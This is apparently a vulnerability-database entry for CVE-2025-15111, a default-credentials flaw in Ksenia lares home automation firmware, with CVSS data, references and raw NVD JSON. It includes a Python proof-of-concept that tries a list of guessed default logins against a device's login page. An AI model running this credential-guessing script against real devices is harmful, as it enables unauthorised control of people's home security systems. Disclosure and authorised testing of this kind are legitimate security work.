CVE-2025-15111

Description

Ksenia Security lares (legacy model) version 1.6 contains a default credentials vulnerability that allows unauthorized attackers to gain administrative access. Attackers can exploit the weak default administrative credentials to obtain full control of the home automation system.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:kseniasecurity:lares_firmware:1.6:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:kseniasecurity:lares:4.0:*:*:*:*:*:*:* - NOT VULNERABLE

Ksenia Security lares legacy model < 1.6

Ksenia Security lares legacy model = 1.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-15111 PoC - Ksenia Security lares Default Credentials
This PoC demonstrates the default credentials vulnerability in Ksenia Security lares
WARNING: Only use for authorized security testing
"""

import requests
import sys

# Target configuration
TARGET_HOST = "http://target-ip"  # Replace with target IP
LOGIN_ENDPOINT = f"{TARGET_HOST}/login"

# Common default credentials for Ksenia lares
DEFAULT_CREDENTIALS = [
    {"username": "admin", "password": "admin"},
    {"username": "admin", "password": "1234"},
    {"username": "admin", "password": "ksenia"},
    {"username": "installer", "password": "installer"},
    {"username": "user", "password": "user"},
]

def check_default_credentials():
    """Check if target is vulnerable to default credentials"""
    print(f"[*] Scanning target: {TARGET_HOST}")
    
    for creds in DEFAULT_CREDENTIALS:
        try:
            response = requests.post(
                LOGIN_ENDPOINT,
                data={
                    "username": creds["username"],
                    "password": creds["password"]
                },
                timeout=10
            )
            
            if response.status_code == 200 and "session" in response.text.lower():
                print(f"[+] SUCCESS! Valid credentials found:")
                print(f"    Username: {creds['username']}")
                print(f"    Password: {creds['password']}")
                return True
                
        except requests.exceptions.RequestException as e:
            print(f"[-] Error connecting to target: {e}")
            
    print("[-] No valid default credentials found")
    return False

if __name__ == "__main__":
    check_default_credentials()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15111
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15111
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15111/
[4] VulDB https://vuldb.com/cve/CVE-2025-15111
[5] https://packetstorm.news/files/id/190180/
[6] https://www.kseniasecurity.com/
[7] https://www.vulncheck.com/advisories/ksenia-security-lares-home-automation-default-credentials-vulnerability
[8] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5927.php
[9] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5927.php

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15111", "sourceIdentifier": "[email protected]", "published": "2025-12-30T23:15:49.557", "lastModified": "2026-03-11T20:16:12.513", "vulnStatus": "Modified", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "Ksenia Security lares (legacy model) version 1.6 contains a default credentials vulnerability that allows unauthorized attackers to gain administrative access. Attackers can exploit the weak default administrative credentials to obtain full control of the home automation system."}, {"lang": "es", "value": "Ksenia Security Lares 4.0 Home Automation versión 1.6 contiene una vulnerabilidad de credenciales por defecto que permite a atacantes no autorizados obtener acceso administrativo. Los atacantes pueden explotar las credenciales administrativas débiles por defecto para obtener control total del sistema de automatización del hogar."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-259"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:kseniasecurity:lares_firmware:1.6:*:*:*:*:*:*:*", "matchCriteriaId": "DF94F084-2F13-427A-9CB5-9E3E95621C8B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:kseniasecurity:lares:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "DDE71F37-880F-4534-80FF-A2BE3D8E2AD4"}]}]}], "references": [{"url": "https://packetstorm.news/files/id/190180/", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.kseniasecurity.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/ksenia-security-lares-home-automation-default-credentials-vulnerability", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5927.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5927.php", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}